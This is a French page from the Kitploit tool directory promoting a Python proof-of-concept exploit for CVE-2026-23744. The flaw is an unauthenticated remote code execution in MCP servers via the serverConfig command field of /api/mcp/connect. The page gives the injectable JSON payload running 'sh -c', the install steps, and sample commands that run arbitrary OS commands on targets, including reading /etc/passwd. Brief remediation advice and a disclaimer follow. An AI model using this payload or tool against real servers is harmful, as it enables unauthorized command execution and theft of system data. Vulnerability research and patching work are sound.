Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23744-POC — # PoC Python pour CVE-2026-23744, RCE non authentifié dans les serveurs MCP via le champ de commande serverConfig de /api/mcp/connect (port par défaut 6274) | Kitploit
Outils/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

# PoC Python pour CVE-2026-23744, RCE non authentifié dans les serveurs MCP via le champ de commande serverConfig de /api/mcp/connect (port par défaut 6274)

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23744 — Exécution de code à distance non authentifiée sur serveur MCP

Preuve de concept exploit par d3vn0mi

Vue d'ensemble

CVE-2026-23744 est une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans les serveurs compatibles MCP exposés sur le port 6274. Le point de terminaison /api/mcp/connect accepte un objet serverConfig qui permet aux appelants de spécifier une commande OS arbitraire et des arguments — sans aucune vérification d'authentification ou d'autorisation.

Un attaquant ayant un accès réseau au service peut exécuter des commandes arbitraires en tant qu'utilisateur exécutant le serveur MCP.

DétailValeur
ID CVECVE-2026-23744
TypeExécution de code à distance non authentifiée
Point de terminaisonPOST /api/mcp/connect
Port6274 (par défaut)
SévéritéCritique

Charge utile vulnérable

root@kitploit:~
{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_COMMAND>"],
    "env": {}
  },
  "serverId": "anything"
}

Le serveur lance la command fournie avec les args donnés sans assainissement ni contrôle d'accès.

Installation

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

Utilisation

root@kitploit:~
# Utilisation de base
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'

# Port personnalisé
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# Ignorer la vérification de joignabilité
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# ID de serveur personnalisé
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

Options

IndicateurDescription
-t, --targetIP ou nom d'hôte cible (requis)
-c, --commandCommande OS à exécuter (requise)
-p, --portPort cible (par défaut : 6274)
-s, --server-idValeur serverId dans la charge utile
--timeoutDélai d'expiration de la sonde en secondes (par défaut : 30)
--no-checkIgnorer la vérification initiale de joignabilité

Remédiation

  • N'exposez pas le serveur MCP à des réseaux non fiables.
  • Appliquez les correctifs du fournisseur dès qu'ils sont disponibles.
  • Restreignez l'accès au point de terminaison /api/mcp/connect via l'authentification et des contrôles au niveau du réseau.
  • Surveillez les lancements de processus inattendus à partir du processus du serveur MCP.

Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive. Obtenez toujours une autorisation appropriée avant de tester.

Licence

Ce projet est sous licence MIT License.

Auteur

d3vn0mi — github.com/d3vn0mi

Télécharger l’outil